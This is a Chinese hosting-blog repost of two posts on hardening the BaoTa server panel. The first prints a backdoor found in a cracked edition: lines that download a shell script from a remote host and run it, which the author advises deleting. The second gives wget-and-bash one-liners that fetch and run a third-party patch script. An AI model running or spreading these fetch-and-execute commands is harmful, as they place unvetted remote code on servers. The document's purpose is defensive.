海外优质VPS
高性价比免备案主机推荐

如何安全的使用宝塔面板

摘自:https://hostloc.com/thread-1015891-1-1.html
作者:bagheera

如何安全的使用宝塔

先来问一个问题, 为何要使用宝塔: 方便的安装配置环境, 管理站点.
以下建议满足上述基础需求,更高需求满足不了.

1, 免费版: 安装完需要的环境软件, 插件. 然后 ssh 里面 service bt stop, 就会停掉bt进程, 环境不受影响,cron类应该只有一个let证书续费,不会链接bt官网.
2, 收费版: service bt stop后,可能需要定期进后台用到 防护统计,访问统计等插件, 可以在使用时候 service bt start, 访问后台,用完再stop.
bt进程日常就不应该运行.
3,开心版hostcli: 食用方法和上述一致外, 此开心版还加了一个”远程执行后门”, 可以手动修改,删除掉代码,也可以使用.
后门文件在

/www/server/panel/script/check_files.py

删除掉最后三行,这三行是从他服务器上下载一个sh,然后执行这个sh, 目前访问这个地址返回空内容,后门可能随时启用

checkFile="/www/server/panel/install/check_bt_file.sh"
wget -O ${checkFile} 'https://v7.hostcli.com/tools/check_bt_file.sh'                       
. ${checkFile}

开心版只找到这一个后门, 里面还有没有不好说… 删掉这三行,再加上 service bt stop, 应该是安全的.
第三方插件内也可能存在远程执行代码, 原版和开心版都有可能, 可自行下载插件代码分析.

摘自:https://blog.cccyun.cn/post-431.html
作者:消失的彩虹海

自用的宝塔面板一键优化补丁

这个是自用的宝塔面板一键优化补丁,主要有以下优化项目:

1.去除宝塔面板强制绑定账号

2.去除各种删除操作时的计算题与延时等待

3.去除创建网站自动创建的垃圾文件(index.html、404.html、.htaccess)

4.关闭未绑定域名提示页面,防止有人访问未绑定域名直接看出来是用的宝塔面板

5.关闭活动推荐与在线客服

6.去除自动校验文件与上报信息定时任务

7.去除面板日志与网站绑定域名上报

wget -O optimize.sh http://f.cccyun.cc/bt/optimize.sh && bash optimize.sh

适用宝塔面板版本:7.7

全部使用补丁的方式,而不是替换文件的方式,方便后续升级版本的修改。

适用宝塔面板7.9版本的命令(7.9版本不支持去除强制绑定账号,新增去除面板首页广告):

wget -O optimize.sh http://f.cccyun.cc/bt/optimize_new.sh && bash optimize.sh

注意:此补丁可能导致安装第三方失败。

赞(0)
本站所刊载内容均为网络上收集整理,本站不保证其真实性和准确性,所有内容仅供大家娱乐参考。如有异议,请与本站联系,会尽快处理争议内容。VPS主机推荐 » 如何安全的使用宝塔面板

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址